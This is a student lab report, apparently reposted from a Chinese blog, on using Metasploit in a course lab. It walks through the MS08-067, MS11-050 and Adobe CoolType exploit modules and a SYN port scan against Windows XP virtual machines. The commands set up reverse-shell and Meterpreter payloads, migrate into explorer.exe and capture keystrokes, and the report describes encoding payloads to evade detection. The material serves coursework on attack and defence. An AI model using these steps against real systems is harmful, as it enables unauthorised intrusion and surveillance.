• 20145236《网络攻防》Exp5 MSF基础应用


    20145236《网络攻防》Exp5 MSF基础应用

    一、基础问题回答

    • 解释exploitpayloadencode是什么:
      • exploit就是负责负载有用代码的交通工具,先通过exploit把路打通、打开以后,好让有用代码能够作用与目的地;
      • payload就是有具体功能作用的代码,能够完成具体交代的任务,即exploit所负载的东西;
      • encode就是对payload进行再编译,避免打上“危险物品切勿签收”的标签,让被攻击者一下子就知道这是病毒;

    二、实验感想

    这次实验运用不同的漏洞进行了攻击,其中比较纠结的攻击就是IE浏览器攻击和最后一个辅助模块的攻击。因为之前老师给出的windowsXP靶机中IE已经是更新过补丁的版本了所以导致攻击各种不成功,后来换了台虚拟机才做好了这个实验。至于辅助模块的攻击……其中有很多是靶机已经安装过补丁的,因此很容易出现攻击无效之类的事情,还有就是因为windows7虚拟机不是正版的原因导致无法下载有漏洞的更新==
    并且在小实验四中我感觉盲目的寻找攻击模块太被动了,很容易像我这次实验一样各种撞墙,因为不知道靶机是否存在漏洞,可以选择用一些漏洞扫描工具扫描一下靶机再选择攻击。
    从这次的实验中我深刻体会到了更新漏洞补丁是必须的,之前看系统提示漏洞补丁什么的我因为嫌麻烦都忽略了,现在看来可能早已中了什么病毒,找时间好好修补一下漏洞查杀一遍电脑吧……

    三、实验过程记录

    本次实验环境配置

    • 攻击机:Kali
    • 靶机:win XP SP3(English)

    MS08-067漏洞攻击

    Step1

    • 启用msf终端:msfconsole
    • 可以通过:search ms08_067,查找相应的漏洞
    • 找到后,会显示相应漏洞的模块,如下图所示:

    Step2

    • msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过help来查找

    • 根据上述漏洞的模块,我们可以选择相应的模块

      • use exploit/windows/smb/ms08_067_netapi
    • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷

      • show payloads
    • 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷

      • 如:set payload generic/shell_reverse_tcp
    • 注意:此处的目的是获取shell,如果想用meterpreter,找到相应的payload并设置即可

    Step3

    • 查看配置渗透攻击所需的配置项
      • show options
    • 通过上述操作,可以让我们知道有哪些参数需要进行配置
    set LHOST 192.168.85.129    //设置攻击IP
    set RHOST 192.168.85.137    //设置靶机IP
    

    • 接下来可以看看有哪些合适的靶机平台
      • show targets
      • 设置相应平台的编号:set target 0
      • 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台

    Step4

    • 发起渗透攻击(在自己电脑上怎么都攻击不成功,换了另外一台KALI还是不行,后来从别人电脑直接拷了个Win XP ensp3,成功了)

      • exploit
    • kali机执行ipconfig/all

    • windows执行同样的操作

    MS11-050漏洞攻击

    Step1

    • 同上述步骤,第一步,查找相关漏洞信息

    Step2

    • 加载相应模块
      • use windows/browser/ms11_050_mshtml_cobjectelement
    • 找到模块后,可以通过info指令查看模块详细信息

    Step3

    • 加载payload
      • set payload windows/meterpreter/reverese_tcp
      • 这里采用meterpreter方式获取权限
    • 设置相应参数,通过show options查看
    set URIPATH ms5236  //设置访问主页的URI
    set LHOST 192.168.85.129    //设置攻击IP
    set LPORT 5236  //设置攻击端口
    

    Step4

    • 发起渗透攻击

      • exploit
    • 此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.211.132:8080/ms5236

    • msf下可看见创建了一个ID为1的session

    • sessions -i 1开始连接后抓取靶机键盘

    • 获取shell

    Adobe阅读器渗透攻击(针对客户端)

    • kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing,然后输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷payloads
    set LHOST "KALI Ip"
    
    set FILENAME xxx.pdf
    
    set LPORT xxxx
    

    • exploit,生成pdf文件以后拷贝到xp虚拟机

    • back返回,使用use exploit/multi/handler新建一个监听模块。

    • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。端口号设置和攻击模块里的数据设置相同。

    • 在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码

    • 反弹链接后成功

    • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示,使用命令migrate 992

    • 输入shell,查看xp靶机信息

    应用辅助模块

    Step1

    • 进入msfconsle后,通过下面相关指令查找辅助模块
      • show auxiliary
    • 选取相应的moudle,在这里选择如下:
      • use auxiliary/scanner/portscan/syn

    Step2

    • 设置好相应参数,可以通过show options来查看
    set RHOSTS 192.168.85.128   //设置扫描目标IP地址
    set THREADS 50  //设置线程数
    

    Step3

    • 启动:run,扫描结果如下:
  • 相关阅读:
    linux centos7 安装mysql-5.7.17教程(图解)
    java中equals,hashcode和==的区别
    常用正则表达式大全
    MyEclipse中的重命名
    MyEclipse中查询
    Java中的代理模式
    Java中的枚举
    Java中的异常-Throwable-Error-Exception-RuntimeExcetpion-throw-throws-try catch
    eclipse将编辑栏一分为二
    图的存储,搜索,遍历,广度优先算法和深度优先算法,最小生成树-Java实现
  • 原文地址:https://www.cnblogs.com/feng886779/p/8892815.html
Copyright © 2020-2023  润新知